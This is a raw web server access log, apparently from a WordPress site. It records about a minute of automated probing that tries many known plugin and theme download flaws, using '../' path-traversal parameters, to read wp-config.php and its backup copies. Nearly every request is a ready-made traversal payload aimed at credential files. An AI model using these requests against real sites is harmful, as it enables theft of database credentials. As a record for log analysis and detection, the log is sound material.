-	05:48:44	-0500	GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1	403	17036	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:48:45	-0500	GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1	403	17036	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:48:47	-0500	GET /wp-config.php HTTP/1.1	200	5	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:48:48	-0500	GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1	404	69216	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:48:49	-0500	GET /wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes HTTP/1.1	302	5	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:48:50	-0500	GET //wp-login.php?redirect_to=https%3A%2F%2Fwww.jmvaladezjr.com%2Fwp-admin%2Fadmin.php%3Fpage%3Dmiwoftp%26option%3Dcom_miwoftp%26action%3Ddownload%26dir%3D%2F%26item%3Dwp-config.php%26order%3Dname%26srt%3Dyes&reauth=1 HTTP/1.1	200	6012	https://www.jmvaladezjr.com/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:48:51	-0500	GET /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php HTTP/1.1	404	69216	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:48:52	-0500	GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1	404	69223	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:48:54	-0500	GET /wp-config.php.bak HTTP/1.1	404	69216	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:48:57	-0500	GET /wp-config.php.backup HTTP/1.1	404	69216	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:49:00	-0500	GET /wp-config.bak HTTP/1.1	404	69216	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:49:02	-0500	GET /wp-config HTTP/1.1	404	69216	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:49:06	-0500	GET /wp-config.backup HTTP/1.1	404	69216	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:49:11	-0500	GET /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=../../../../wp-config.php HTTP/1.1	404	69216	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:49:15	-0500	GET /wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr HTTP/1.1	302	5	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:49:16	-0500	GET //wp-login.php?redirect_to=https%3A%2F%2Fwww.jmvaladezjr.com%2Fwp-admin%2Fadmin.php%3Fpage%3Dmiwoftp%26option%3Dcom_miwoftp%26action%3Ddownload%26dir%3D%2F%26item%3Dwp-config.php%26order%3Dname%26sr&reauth=1 HTTP/1.1	200	6007	https://www.jmvaladezjr.com/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:49:20	-0500	GET /wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php HTTP/1.1	403	17036	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:49:26	-0500	GET /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php HTTP/1.1	404	69216	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:49:27	-0500	GET /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php HTTP/1.1	404	69216	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:49:29	-0500	GET /wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php HTTP/1.1	404	69216	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:49:31	-0500	GET /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php HTTP/1.1	404	69216	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:49:35	-0500	GET /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1	404	69216	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:49:37	-0500	GET /wp-content/force-download.php?file=../wp-config.php HTTP/1.1	404	69216	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:49:38	-0500	GET /force-download.php?file=wp-config.php HTTP/1.1	404	19015	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:49:39	-0500	GET /wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php HTTP/1.1	404	18101	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:49:40	-0500	GET /wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php HTTP/1.1	404	18101	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
-	05:49:42	-0500	GET /wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..././..././..././wp-config.php HTTP/1.1	404	18101	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64)
